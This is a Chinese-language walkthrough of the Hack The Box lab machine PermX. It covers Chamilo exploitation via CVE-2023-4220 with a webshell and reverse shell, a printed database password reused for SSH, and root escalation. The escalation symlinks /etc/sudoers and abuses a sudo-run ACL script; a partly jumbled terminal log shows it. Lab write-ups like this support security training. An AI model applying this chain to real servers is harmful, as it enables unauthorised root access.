HTB PERMX

逛htb的时候发现有个seasonal挑战 看看又是简单题 我就玩玩

image-20240711095003354

这次我选择使用window 的openvpn链接上那边环境 方便我使用本地的工具啥的

image-20240711100041758

扫到了奇奇怪怪的服务 先访问80端口

image-20240711100148995 域名为http://permx.htb/ 写入hosts文件之后成功访问

image-20240711110150245

没什么东西 好像是静态网页
爆破一下子域名

image-20240711110335882

爆破出来一个lms域名

image-20240711110428601

一个cms 上网查到一个cve CVE-2023-4220-Chamilo

直接存在工具 拿来打

image-20240711110655845

成功写入webshell

image-20240711110720657

使用工具反弹shell出来

查看本地ip

image-20240711110828594

image-20240711110922433

当前是wwwdata权限 无权进入mtz 的home

注意到存在/var/www/chamilo/app/config目录

读取到数据库

image-20240711111433681

chamilo 03F6lY3uXAP2bkW8

数据库翻了翻 没找到什么关键信息 猜测数据库和ssh同密码

image-20240711111859218

尝试直接ssh登录 成功登录

image-20240711112002916

尝试提权

image-20240711112023669

注意到存在 /opt/acl.sh 可以给任意用户 任意文件的任意权限

我们可以给与/etc/sudoers rwx权限 给与sudo su 权限 使得可以无密码su

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
mtz@permx:~$ bash  /opt/acl.sh
Usage: /opt/acl.sh user perm file
mtz@permx:~$
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/sudoers
Target must be a file.
mtz@permx:~$ nano /etc/sudoers
mtz@permx:~$ nano /etc/sudoers
mtz@permx:~$ ln -s /etc/sudoers /home/mtz/sudoerse/mtz/sudoers
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/sudoers
mtz@permx:~$ nano /etc/sudoers
mtz@permx:~$ mtz@permx:~$ sudo su
root@permx:/home/mtz# cd
root@permx:~# ls
backup  reset.sh  root.txt
root@permx:~# cat root.txt
41c0e26321b302f3140a5063676d9393
root@permx:~#

写入

1
mtz   ALL(ALL:ALL)   ALL

即可获得root